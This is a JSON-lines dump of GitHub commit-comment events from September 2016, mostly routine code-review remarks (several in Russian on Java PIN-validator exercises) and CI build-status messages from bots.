{"id":"4625125178","type":"CommitCommentEvent","actor":{"login":"alanbuxey"},"repo":{"name":"FreeRADIUS/freeradius-server"},"payload":{"comment":{"id":19192932,"position":null,"line":null,"path":null,"commit_id":"f187105df7bfe3e98a14d1c6517565a51dd5f19f","created_at":"2016-09-27T15:48:47Z","updated_at":"2016-09-27T15:48:47Z","body":"thanks :)"}},"created_at":"2016-09-27T15:48:47Z"}
{"id":"4625126998","type":"CommitCommentEvent","actor":{"login":"alban"},"repo":{"name":"kinvolk/scope-iowait"},"payload":{"comment":{"id":19192935,"position":9,"line":7,"path":"README.md","commit_id":"d0351289d787ef32a5cb0b5c37692265ed994739","created_at":"2016-09-27T15:49:04Z","updated_at":"2016-09-27T15:49:04Z","body":"Do you want to add the image or delete it?"}},"created_at":"2016-09-27T15:49:04Z"}
{"id":"4625127764","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"TatyanaLomova/JavaSchool"},"payload":{"comment":{"id":19192939,"position":14,"line":14,"path":"src/lesson_05/Terminal/src/Term/PinValidator.java","commit_id":"b5b55071a4b83404c5859327ae1bffc9e3e0a0d4","created_at":"2016-09-27T15:49:11Z","updated_at":"2016-09-27T15:49:11Z","body":"Обычно такие методы валидаторов называются validate"}},"created_at":"2016-09-27T15:49:11Z"}
{"id":"4625130278","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19192944,"position":null,"line":null,"path":null,"commit_id":"76e722c06e47df2185abdba75f3cd53297a90b7e","created_at":"2016-09-27T15:49:35Z","updated_at":"2016-09-27T15:49:35Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1183](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14413&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-27T15:49:35Z"}
{"id":"4625130937","type":"CommitCommentEvent","actor":{"login":"alban"},"repo":{"name":"kinvolk/scope-iowait"},"payload":{"comment":{"id":19192945,"position":5,"line":3,"path":"README.md","commit_id":"d0351289d787ef32a5cb0b5c37692265ed994739","created_at":"2016-09-27T15:49:41Z","updated_at":"2016-09-27T15:49:41Z","body":"double-empty line\r\n(other places in the file too)"}},"created_at":"2016-09-27T15:49:41Z"}
{"id":"4625136688","type":"CommitCommentEvent","actor":{"login":"alepuccetti"},"repo":{"name":"kinvolk/scope-iowait"},"payload":{"comment":{"id":19192953,"position":9,"line":7,"path":"README.md","commit_id":"d0351289d787ef32a5cb0b5c37692265ed994739","created_at":"2016-09-27T15:50:34Z","updated_at":"2016-09-27T15:50:34Z","body":"I want to add it, doing it right now"}},"created_at":"2016-09-27T15:50:34Z"}
{"id":"4625137564","type":"CommitCommentEvent","actor":{"login":"alban"},"repo":{"name":"kinvolk/scope-iowait"},"payload":{"comment":{"id":19192954,"position":15,"line":13,"path":"README.md","commit_id":"d0351289d787ef32a5cb0b5c37692265ed994739","created_at":"2016-09-27T15:50:42Z","updated_at":"2016-09-27T15:50:42Z","body":"* Using a pre-built Docker image"}},"created_at":"2016-09-27T15:50:42Z"}
{"id":"4625140273","type":"CommitCommentEvent","actor":{"login":"alban"},"repo":{"name":"kinvolk/scope-iowait"},"payload":{"comment":{"id":19192959,"position":25,"line":23,"path":"README.md","commit_id":"d0351289d787ef32a5cb0b5c37692265ed994739","created_at":"2016-09-27T15:51:08Z","updated_at":"2016-09-27T15:51:08Z","body":"* Recompiling an image"}},"created_at":"2016-09-27T15:51:08Z"}
{"id":"4625150647","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"TatyanaLomova/JavaSchool"},"payload":{"comment":{"id":19192982,"position":25,"line":25,"path":"src/lesson_05/Terminal/src/Term/PinValidator.java","commit_id":"b5b55071a4b83404c5859327ae1bffc9e3e0a0d4","created_at":"2016-09-27T15:52:40Z","updated_at":"2016-09-27T15:52:40Z","body":"Валидатор должно только валидировать. Предложение о вводе пина к нему не относится.\r\nЗдесь получается, что класс выполняет 3 роли:\r\n- форма ввода пина + проверка корректности ввода;\r\n- проверка пина (только это он должен был делать);\r\n- проверка числа неудачных попыток."}},"created_at":"2016-09-27T15:52:40Z"}
{"id":"4625151343","type":"CommitCommentEvent","actor":{"login":"hodgestar"},"repo":{"name":"LimaLinks/FirstSprint"},"payload":{"comment":{"id":19192985,"position":null,"line":null,"path":null,"commit_id":"8471309cc5d67a0313f23e324c7aa113ec333e6d","created_at":"2016-09-27T15:52:46Z","updated_at":"2016-09-27T15:52:46Z","body":"`.pyc` files should not be committed to the repository (as explained in Slack previously)."}},"created_at":"2016-09-27T15:52:46Z"}
{"id":"4625151529","type":"CommitCommentEvent","actor":{"login":"elitemusic23"},"repo":{"name":"elitemusic23/hello-worl"},"payload":{"comment":{"id":19192987,"position":10,"line":10,"path":".gitignore","commit_id":"08b14dbdd5daf8000dadb94ec5569d1c86617b01","created_at":"2016-09-27T15:52:48Z","updated_at":"2016-09-27T15:52:48Z","body":"sd"}},"created_at":"2016-09-27T15:52:48Z"}
{"id":"4625154134","type":"CommitCommentEvent","actor":{"login":"terrillmoore"},"repo":{"name":"things-nyc/arduino-lmic"},"payload":{"comment":{"id":19192992,"position":null,"line":null,"path":null,"commit_id":"40e96518686393932ae3ee73aa7c06ee9af993d6","created_at":"2016-09-27T15:53:12Z","updated_at":"2016-09-27T15:53:12Z","body":"If the device meets FCC requirements when joining on all channels, this does too, and the loop can’t be longer than 56 channels.  Average will be 8.  The power consumed for the choice is in any case identical but we save the transmit power.\n\n \n\n--Terry\n\n \n\nFrom: Frank Leon Rose [mailto:notifications@github.com] \nSent: Tuesday, September 27, 2016 10:31\nTo: things-nyc/arduino-lmic <arduino-lmic@noreply.github.com>\nCc: Terry Moore <tmm@mcci.com>; Mention <mention@noreply.github.com>\nSubject: Re: [things-nyc/arduino-lmic] Honor the channel mask while trying to join the network. (40e9651)\n\n \n\n@terrillmoore <https://github.com/terrillmoore>  I isolated this change and submitted a PR to Matthijs. I won't be surprised if he rejects it based on the possibly never-ending do-while loop (taking repeated random guesses until hitting an enabled channel). Statistically it could go on for a long time if the guesses keep falling poorly. Also if only a single channel is enabled, or worse yet, none.\n\nStill, I prefer your solution to the one a few lines above (in _nextTx()) which does a \"next random channel\" search but statistically favors the first channel of a sub-band 8 to 1 (with one active sub-band). I'll ponder how to make an even-handed yet finite duration algorithm.\n\n—\nYou are receiving this because you were mentioned.\nReply to this email directly, view it on GitHub <https://github.com/things-nyc/arduino-lmic/commit/40e96518686393932ae3ee73aa7c06ee9af993d6#commitcomment-19192659> , or mute the thread <https://github.com/notifications/unsubscribe-auth/ASb_7-i31fi69RNWPUWkYiUml2n7CarQks5quTbRgaJpZM4KH0Ec> .\n\n"}},"created_at":"2016-09-27T15:53:12Z"}
{"id":"4625157308","type":"CommitCommentEvent","actor":{"login":"dinhviethoa"},"repo":{"name":"facebook/buck"},"payload":{"comment":{"id":19193001,"position":null,"line":null,"path":null,"commit_id":"7329cb8e190cba9d6fc37621726a287b362024be","created_at":"2016-09-27T15:53:40Z","updated_at":"2016-09-27T15:53:40Z","body":"The project generation phase duration was reduced by 40% in our specific case where there are thousands of dependencies."}},"created_at":"2016-09-27T15:53:40Z"}
{"id":"4625164906","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"TatyanaLomova/JavaSchool"},"payload":{"comment":{"id":19193014,"position":50,"line":50,"path":"src/lesson_05/Terminal/src/Term/PinValidator.java","commit_id":"b5b55071a4b83404c5859327ae1bffc9e3e0a0d4","created_at":"2016-09-27T15:54:51Z","updated_at":"2016-09-27T15:54:51Z","body":"Такое исключение лучше вынести в отдельный файл.\r\nВообще непубличные классы в рамках одного файла - плохой тон.\r\n+ обычно исключения называются более говорящими словами, например, InvalidPinException"}},"created_at":"2016-09-27T15:54:51Z"}
{"id":"4625167399","type":"CommitCommentEvent","actor":{"login":"acrm"},"repo":{"name":"EkaSe/HelloWorld"},"payload":{"comment":{"id":19193022,"position":9,"line":9,"path":"HelloWorld/Miscellaneous/MemoryModel2.cs","commit_id":"c9221fad885ccdde1f4739907b2e898ee87b3ff6","created_at":"2016-09-27T15:55:15Z","updated_at":"2016-09-27T15:55:15Z","body":"Идея сделать метод, записывающий сразу 2 байта (его можно было бы назвать WriteUInt16) хорошая, так как действительно мы много оперируем записями имено двух байтом. Но можно пойти ещё дальше. Самый удобный уровень записи для нас - это уровень записи сразу целой команды, 8 байт. Первым параметром идёт код команды, а потом ещё параметра типа ushort. Так же будет удобно использовать ref-параметр offset, который будет изменяться  внутри метода, тогда не нужно будет постоянно возвращать из метода новое значение для него. Или другой вариант, передавать смещения начала команды всегда первым параметром и нигде его не суммировать - просто задавать каждый раз вручную. У этого есть плюс в том, что получится запись вароде такой:\r\nWrtiteInstruction(0, InstructionCode.AssignUInt8Const, ....);\r\nWrtiteInstruction(8, InstructionCode.AssignUInt8Const, ....);\r\n...\r\nWrtiteInstruction(64, InstructionCode.SkipIfZero, ....);\r\nWrtiteInstruction(72, InstructionCode.Jump, 96, ....);\r\n...\r\nWrtiteInstruction(96, InstructionCode.AssignIUnt8Var, ....);\r\n\r\nТо есть, в такой записи все адреса команд будут у нас перед глазами и будет проще воспринимать такой код) Потому что, честно говоря, я до сих пор не могу разобрать, как там у тебя происходит проверка, достаточно ли сахара)"}},"created_at":"2016-09-27T15:55:15Z"}
{"id":"4625170084","type":"CommitCommentEvent","actor":{"login":"korbul"},"repo":{"name":"firebase/Firebase-Unity"},"payload":{"comment":{"id":19193027,"position":null,"line":null,"path":null,"commit_id":"9e9c415a7f4133832e8a61026e3ac83a258a7307","created_at":"2016-09-27T15:55:39Z","updated_at":"2016-09-27T15:55:39Z","body":"Any update on this? September ends in a few days."}},"created_at":"2016-09-27T15:55:39Z"}
{"id":"4625170428","type":"CommitCommentEvent","actor":{"login":"thebigsmileXD"},"repo":{"name":"ClearSkyTeam/ClearSky"},"payload":{"comment":{"id":19193028,"position":null,"line":null,"path":null,"commit_id":"2b022d9a04c2856025e7f9f375bbaaadd38f46d2","created_at":"2016-09-27T15:55:42Z","updated_at":"2016-09-27T15:55:42Z","body":"Lel.\r\ni still wonder why github doesnt understand that the changes already exist"}},"created_at":"2016-09-27T15:55:42Z"}
{"id":"4625174734","type":"CommitCommentEvent","actor":{"login":"alextricity25"},"repo":{"name":"evrardjp/rpc-openstack"},"payload":{"comment":{"id":19193037,"position":null,"line":null,"path":null,"commit_id":"a8a778425ded792ffcab2e39da2f42a080c40370","created_at":"2016-09-27T15:56:21Z","updated_at":"2016-09-27T15:56:21Z","body":"I'm I right when I say this solution just nukes the overrides files after an upgrade, and re-inserts all of the AIO-specific variables that are currently defined in ``deploy.sh``?"}},"created_at":"2016-09-27T15:56:21Z"}
{"id":"4625177432","type":"CommitCommentEvent","actor":{"login":"n-sviridenko"},"repo":{"name":"RubaXa/Sortable"},"payload":{"comment":{"id":19193041,"position":17,"line":1005,"path":"Sortable.js","commit_id":"887fe9d4897bd61dd9506a7041bd0fa6e4ceb411","created_at":"2016-09-27T15:56:47Z","updated_at":"2016-09-27T15:56:47Z","body":"When I'm using it on my `site.com` I have `Uncaught TypeError: Cannot use 'in' operator to search for 'host' in site.com`"}},"created_at":"2016-09-27T15:56:47Z"}
{"id":"4625183310","type":"CommitCommentEvent","actor":{"login":"Psykie"},"repo":{"name":"paulstringer/OCSlimProject"},"payload":{"comment":{"id":19193056,"position":4,"line":50,"path":"OCSlimProject.podspec","commit_id":"9fbdefd10a732531af778071f24579dc5580c504","created_at":"2016-09-27T15:57:40Z","updated_at":"2016-09-27T15:57:40Z","body":"Hi Paul, why did you set 9.0 as available platforms for iOS, and not iOS 8.0? Is there any valid reason? Furthermore you did that in August, before iOS 10 official release."}},"created_at":"2016-09-27T15:57:40Z"}
{"id":"4625185159","type":"CommitCommentEvent","actor":{"login":"jim-minter"},"repo":{"name":"jim-minter/jenkins-plugin"},"payload":{"comment":{"id":19193066,"position":null,"line":null,"path":null,"commit_id":"7da55034807b98c66f897cbca7fddf7865fa8ef2","created_at":"2016-09-27T15:57:57Z","updated_at":"2016-09-27T15:57:57Z","body":"@gabemontero ptal"}},"created_at":"2016-09-27T15:57:57Z"}
{"id":"4625186481","type":"CommitCommentEvent","actor":{"login":"DanIverson"},"repo":{"name":"OpenVnmrJ/OpenVnmrJ"},"payload":{"comment":{"id":19193071,"position":null,"line":null,"path":null,"commit_id":"e0d0ff9fb2400e3fe9fc40314607482871d9e911","created_at":"2016-09-27T15:58:09Z","updated_at":"2016-09-27T15:58:09Z","body":"The change to line 140 of ovjmacout.sh does not look right. The > redirect will erase the version ID and date put into vnmrrev by the src/common/SConstruct"}},"created_at":"2016-09-27T15:58:09Z"}
{"id":"4625187482","type":"CommitCommentEvent","actor":{"login":"LethalGhost"},"repo":{"name":"animusdev/Old-World-Blue"},"payload":{"comment":{"id":19193075,"position":null,"line":null,"path":null,"commit_id":"b77af4b92018f04dd00e3b922d5b5e6a422d3187","created_at":"2016-09-27T15:58:18Z","updated_at":"2016-09-27T15:58:18Z","body":"Мне кажется, что ты немного торопишь события.\r\nТела были перерисованы для Поляриса. Дырки на спрайтах одежды будут не на месте, перчатки поедут, одежда получит слишком короткие рукава."}},"created_at":"2016-09-27T15:58:18Z"}
{"id":"4625188142","type":"CommitCommentEvent","actor":{"login":"alexandr-san4ez"},"repo":{"name":"cmderdev/cmder"},"payload":{"comment":{"id":19193076,"position":null,"line":null,"path":null,"commit_id":"9c0ad9fd8139809f612a73d8a51d840be05794ea","created_at":"2016-09-27T15:58:24Z","updated_at":"2016-09-27T15:58:24Z","body":"@MartiUK, done.\r\n#1101 "}},"created_at":"2016-09-27T15:58:24Z"}
{"id":"4625188553","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"TatyanaLomova/JavaSchool"},"payload":{"comment":{"id":19193077,"position":14,"line":14,"path":"src/lesson_05/Terminal/src/Term/TerminalImpl.java","commit_id":"b5b55071a4b83404c5859327ae1bffc9e3e0a0d4","created_at":"2016-09-27T15:58:28Z","updated_at":"2016-09-27T15:58:28Z","body":"Если есть TerminalException, то иметь ещё и PinException нет смысла."}},"created_at":"2016-09-27T15:58:28Z"}
{"id":"4625189826","type":"CommitCommentEvent","actor":{"login":"julienberger"},"repo":{"name":"julienberger/hello-world"},"payload":{"comment":{"id":19193078,"position":null,"line":null,"path":null,"commit_id":"5b6f74b49c80e4e050a82af23d47c925854cf621","created_at":"2016-09-27T15:58:40Z","updated_at":"2016-09-27T15:58:40Z","body":"hih"}},"created_at":"2016-09-27T15:58:40Z"}
{"id":"4625194544","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19193092,"position":null,"line":null,"path":null,"commit_id":"76e722c06e47df2185abdba75f3cd53297a90b7e","created_at":"2016-09-27T15:59:22Z","updated_at":"2016-09-27T15:59:22Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1183](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14413&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 251, ignored: 3 Build time: 00:09:47"}},"created_at":"2016-09-27T15:59:22Z"}
{"id":"4625195287","type":"CommitCommentEvent","actor":{"login":"peterlarson"},"repo":{"name":"peterlarson/cageOS"},"payload":{"comment":{"id":19193094,"position":null,"line":null,"path":null,"commit_id":"3f23d7339e4dce911fd91e1978783c6e261d543a","created_at":"2016-09-27T15:59:29Z","updated_at":"2016-09-27T15:59:29Z","body":"Cool"}},"created_at":"2016-09-27T15:59:29Z"}
{"id":"4625196989","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19193098,"position":null,"line":null,"path":null,"commit_id":"8ada781ee45c824c6eff6353fccde5a4a34b93e0","created_at":"2016-09-27T15:59:45Z","updated_at":"2016-09-27T15:59:45Z","body":"PrepFor86Release (Myoldmopar) - x86_64-MacOS-10.9-clang: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8ada781ee45c824c6eff6353fccde5a4a34b93e0-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8ada781ee45c824c6eff6353fccde5a4a34b93e0-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-27T15:59:45Z"}
{"id":"4625205251","type":"CommitCommentEvent","actor":{"login":"OnsetJon"},"repo":{"name":"openwsn-berkeley/openwsn-fw"},"payload":{"comment":{"id":19193110,"position":null,"line":null,"path":null,"commit_id":"6146abe57e7ebdb8bb3ef60d69c754dfdf3d02a8","created_at":"2016-09-27T16:01:00Z","updated_at":"2016-09-27T16:01:00Z","body":"Right, however openqueue_removeAllCreatedBy(COMPONENT_ICMPv6RPL); will clear all the pending packets.  It has the potential to lock one of the flags to true."}},"created_at":"2016-09-27T16:01:00Z"}
{"id":"4625210094","type":"CommitCommentEvent","actor":{"login":"LouisGac"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19193118,"position":null,"line":null,"path":null,"commit_id":"50456e1a7ed90d37545e14162d4a7ce6ab241cb5","created_at":"2016-09-27T16:01:46Z","updated_at":"2016-09-27T16:01:46Z","body":"ok"}},"created_at":"2016-09-27T16:01:46Z"}
{"id":"4625210402","type":"CommitCommentEvent","actor":{"login":"yan12125"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":19193119,"position":10,"line":10,"path":"ChangeLog","commit_id":"dd2cffeeec8feac8fe52924760b2cb368249396a","created_at":"2016-09-27T16:01:49Z","updated_at":"2016-09-27T16:01:49Z","body":"Duplication of line 22"}},"created_at":"2016-09-27T16:01:49Z"}
{"id":"4625212628","type":"CommitCommentEvent","actor":{"login":"javaok1987"},"repo":{"name":"javaok1987/traffic-analytics"},"payload":{"comment":{"id":19193124,"position":null,"line":null,"path":null,"commit_id":"7ca14804ec2370215e16a9d1180730554247a5fe","created_at":"2016-09-27T16:02:11Z","updated_at":"2016-09-27T16:02:11Z","body":"`> move(100);`"}},"created_at":"2016-09-27T16:02:11Z"}
{"id":"4625218803","type":"CommitCommentEvent","actor":{"login":"pfitzseb"},"repo":{"name":"JunoLab/Blink.jl"},"payload":{"comment":{"id":19193153,"position":null,"line":null,"path":null,"commit_id":"c1d9e2562ad1a9e02373cc984feeeb4f5dd0a64f","created_at":"2016-09-27T16:03:11Z","updated_at":"2016-09-27T16:03:11Z","body":"There's a use of `Requires.@init`, so that should be removed as well..."}},"created_at":"2016-09-27T16:03:11Z"}
{"id":"4625222015","type":"CommitCommentEvent","actor":{"login":"Alucard648"},"repo":{"name":"Wohlstand/PGE-Project"},"payload":{"comment":{"id":19193157,"position":null,"line":null,"path":null,"commit_id":"0caa63d0780e26ced0fcb04571adf3596b846ed2","created_at":"2016-09-27T16:03:42Z","updated_at":"2016-09-27T16:03:42Z","body":"Is it possible, as for now, to replace NPC algorithm script via customization?"}},"created_at":"2016-09-27T16:03:42Z"}
{"id":"4625223642","type":"CommitCommentEvent","actor":{"login":"moneroj"},"repo":{"name":"moneroj/moneroj"},"payload":{"comment":{"id":19193160,"position":null,"line":null,"path":null,"commit_id":"ba471390f069390944f3be4965447c890bb0d1dc","created_at":"2016-09-27T16:03:59Z","updated_at":"2016-09-27T16:03:59Z","body":"Initial commit."}},"created_at":"2016-09-27T16:03:59Z"}
{"id":"4625224152","type":"CommitCommentEvent","actor":{"login":"necto"},"repo":{"name":"Bromind/Semester-project"},"payload":{"comment":{"id":19193161,"position":16,"line":16,"path":"main.c","commit_id":"0b6323ef1ee3d9f765d9201046ca900cb0663661","created_at":"2016-09-27T16:04:04Z","updated_at":"2016-09-27T16:04:04Z","body":"Please think again about this test. The whole idea of the comparison callback consists in allowing the user to check if two keys are equal knowing their internal representation. \r\nComparing pointer values is correct only when you are certain, there may be no two identical keys in different memory locations, which is accidentally true for the main function below, but I would not rely on it."}},"created_at":"2016-09-27T16:04:04Z"}
{"id":"4625225185","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"TatyanaLomova/JavaSchool"},"payload":{"comment":{"id":19193166,"position":9,"line":9,"path":"src/lesson_05/Terminal/src/Term/TerminalServerImpl.java","commit_id":"b5b55071a4b83404c5859327ae1bffc9e3e0a0d4","created_at":"2016-09-27T16:04:14Z","updated_at":"2016-09-27T16:04:14Z","body":"Статус аккаунта и остаток средств не являются атрибутами терминального сервера."}},"created_at":"2016-09-27T16:04:14Z"}
{"id":"4625226519","type":"CommitCommentEvent","actor":{"login":"benmcollins"},"repo":{"name":"benmcollins/libjwt"},"payload":{"comment":{"id":19193172,"position":4,"line":64,"path":"libjwt/jwt.c","commit_id":"cc4e797a1510d8a95ebdf96fd4a70a7152fdc540","created_at":"2016-09-27T16:04:28Z","updated_at":"2016-09-27T16:04:28Z","body":"Please use tabs for indentation to match the style in the rest of the file."}},"created_at":"2016-09-27T16:04:28Z"}
{"id":"4625231381","type":"CommitCommentEvent","actor":{"login":"silasary"},"repo":{"name":"silasary/Penny-Dreadful-Discord-Bot"},"payload":{"comment":{"id":19193182,"position":null,"line":null,"path":null,"commit_id":"0f5b042bcfa3aa0653b3cec30439fc10d36f526c","created_at":"2016-09-27T16:05:15Z","updated_at":"2016-09-27T16:05:15Z","body":"Implements #16 "}},"created_at":"2016-09-27T16:05:15Z"}
{"id":"4625233834","type":"CommitCommentEvent","actor":{"login":"stevoland"},"repo":{"name":"maciejrybaniec/apollo-redux-sandbox"},"payload":{"comment":{"id":19193187,"position":13,"line":23,"path":"src/Containers/MessengerContainer.jsx","commit_id":"b91f6e9b8b99ce8fb992e3a5a5e533fdcd445a44","created_at":"2016-09-27T16:05:39Z","updated_at":"2016-09-27T16:05:39Z","body":"Think this could just be \r\n\r\n```\r\nconst mapDispatchToProps = {\r\n  requestedInitialize,\r\n  requestedUsers\r\n}\r\n```\r\n\r\nBut maybe you prefer it to be explicit."}},"created_at":"2016-09-27T16:05:39Z"}
{"id":"4625234328","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"ValentinaSbLn/Exception"},"payload":{"comment":{"id":19193189,"position":18,"line":18,"path":"src/exception/AccountIsLockedException.java","commit_id":"c7aa98f17d4831d7c98331a5021d762f31e5d77a","created_at":"2016-09-27T16:05:44Z","updated_at":"2016-09-27T16:05:44Z","body":"На одной из следующих лекций поговорим о проблемах Timer'а и о том, почему сейчас его не рекомендуют использовать."}},"created_at":"2016-09-27T16:05:44Z"}
{"id":"4625237931","type":"CommitCommentEvent","actor":{"login":"necto"},"repo":{"name":"Bromind/Semester-project"},"payload":{"comment":{"id":19193196,"position":21,"line":21,"path":"main.c","commit_id":"0b6323ef1ee3d9f765d9201046ca900cb0663661","created_at":"2016-09-27T16:06:18Z","updated_at":"2016-09-27T16:06:18Z","body":"\\tab as indentation is fine. However, if you do not object let us stick to spaces: two spaces per level"}},"created_at":"2016-09-27T16:06:18Z"}
{"id":"4625242811","type":"CommitCommentEvent","actor":{"login":"GaryB432"},"repo":{"name":"preboot/angular2-webpack"},"payload":{"comment":{"id":19193209,"position":null,"line":null,"path":null,"commit_id":"c668fc32e25b792d09e280833086948d22cac864","created_at":"2016-09-27T16:07:06Z","updated_at":"2016-09-27T16:07:06Z","body":"Wondering why selenium was locked.  There is no underlying issue that I can see."}},"created_at":"2016-09-27T16:07:06Z"}
{"id":"4625245858","type":"CommitCommentEvent","actor":{"login":"stevoland"},"repo":{"name":"maciejrybaniec/apollo-redux-sandbox"},"payload":{"comment":{"id":19193223,"position":5,"line":5,"path":"src/Types/Network/NetworkModel.js","commit_id":"60c65f1f70e661367bf772d97920a2053559dbc0","created_at":"2016-09-27T16:07:38Z","updated_at":"2016-09-27T16:07:38Z","body":"Interested in why you chose a decorator rather than inheritance?"}},"created_at":"2016-09-27T16:07:38Z"}
{"id":"4625246575","type":"CommitCommentEvent","actor":{"login":"squito"},"repo":{"name":"markhamstra/spark"},"payload":{"comment":{"id":19193224,"position":54,"line":1279,"path":"core/src/main/scala/org/apache/spark/scheduler/DAGScheduler.scala","commit_id":"368f82d9789ec04565af835e7cb80d1cdb0ccf0c","created_at":"2016-09-27T16:07:44Z","updated_at":"2016-09-27T16:07:44Z","body":"if we are going to touch this part, then can you add a comment on why it even matters that we avoid extra ResubmitFailedStages events?  I was originally going to suggest another change to just always send ResubmitFailedStages till I realized the issue.  Something like:\r\n\r\n> We expect one executor failure to trigger many FetchFailures in Rapid Succession, but we only need to resubmit the stage once, so we try to avoid flooding the scheduler's event queue with these msgs.\r\n\r\nThat actually suggests that the check really should be `!failedStags.contains(stage)` rather than `failedStages.isEmpty`.  It does mean you might have an extra ResubmitFailedStages when there are multiple failed stages, but that doesn't really matter.  (I even question how terrible it would be to have a flood of ResubmitFailedStages events, since the extras would be no-ops, but I guess would need to do some experiments before changing that.)"}},"created_at":"2016-09-27T16:07:44Z"}
{"id":"4625247599","type":"CommitCommentEvent","actor":{"login":"fasterthanlime"},"repo":{"name":"itchio/butler"},"payload":{"comment":{"id":19193227,"position":null,"line":null,"path":null,"commit_id":"5451dac373cd1ac8791522a7dee488543bf1a5ef","created_at":"2016-09-27T16:07:54Z","updated_at":"2016-09-27T16:07:54Z","body":"Woop that commit message should read:\r\n\r\n  * :arrow_up: go-itchio"}},"created_at":"2016-09-27T16:07:54Z"}
{"id":"4625248542","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"ValentinaSbLn/Exception"},"payload":{"comment":{"id":19193231,"position":10,"line":12,"path":"src/exception/InvalidPinException.java","commit_id":"c7aa98f17d4831d7c98331a5021d762f31e5d77a","created_at":"2016-09-27T16:08:03Z","updated_at":"2016-09-27T16:08:03Z","body":"Если специально делали конструктор package-private, то подход хороший. Но не без недостатков - сложно будет добавлять другие реализации валидаторов."}},"created_at":"2016-09-27T16:08:03Z"}
{"id":"4625250762","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"ValentinaSbLn/Exception"},"payload":{"comment":{"id":19193234,"position":9,"line":15,"path":"src/exception/PinValidator.java","commit_id":"c7aa98f17d4831d7c98331a5021d762f31e5d77a","created_at":"2016-09-27T16:08:25Z","updated_at":"2016-09-27T16:08:25Z","body":"Обычно такие методы валидаторов именуются validate"}},"created_at":"2016-09-27T16:08:25Z"}
{"id":"4625252117","type":"CommitCommentEvent","actor":{"login":"anakeen-bot"},"repo":{"name":"Anakeen/dynacase-core"},"payload":{"comment":{"id":19193238,"position":null,"line":null,"path":null,"commit_id":"f902cda528e1af73843f17d9990845644726108d","created_at":"2016-09-27T16:08:38Z","updated_at":"2016-09-27T16:08:38Z","body":"(f902cda) The title of the commit must have refs. \nTitle must end with (refs #<number> [, ....])"}},"created_at":"2016-09-27T16:08:38Z"}
{"id":"4625252679","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/Glyssen"},"payload":{"comment":{"id":19193240,"position":null,"line":null,"path":null,"commit_id":"18814c50ba1eff25d973473d7fcb7f01c75790f5","created_at":"2016-09-27T16:08:43Z","updated_at":"2016-09-27T16:08:43Z","body":"TeamCity Glyssen :: Glyssen pull requests [Build *.*.266.18814c50ba1eff25d973473d7fcb7f01c75790f5](http://build.palaso.org/viewLog.html?buildId=77150&buildTypeId=Glyssen_GlyssenPullRequests) outcome was **SUCCESS**\nSummary: Tests passed: 1289, ignored: 17 Build time: 00:06:00"}},"created_at":"2016-09-27T16:08:43Z"}
{"id":"4625255151","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19193244,"position":null,"line":null,"path":null,"commit_id":"8df72926681d9827a5ea69ab4303f30df39b1f43","created_at":"2016-09-27T16:09:08Z","updated_at":"2016-09-27T16:09:08Z","body":"develop (Myoldmopar) - x86_64-MacOS-10.9-clang: OK (1769 of 1769 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8df72926681d9827a5ea69ab4303f30df39b1f43-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8df72926681d9827a5ea69ab4303f30df39b1f43-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-27T16:09:08Z"}
{"id":"4625255313","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"ValentinaSbLn/Exception"},"payload":{"comment":{"id":19193245,"position":23,"line":25,"path":"src/exception/PinValidator.java","commit_id":"c7aa98f17d4831d7c98331a5021d762f31e5d77a","created_at":"2016-09-27T16:09:10Z","updated_at":"2016-09-27T16:09:10Z","body":"Валидатор должен валидировать. Общаться с клиентом не его задача."}},"created_at":"2016-09-27T16:09:10Z"}
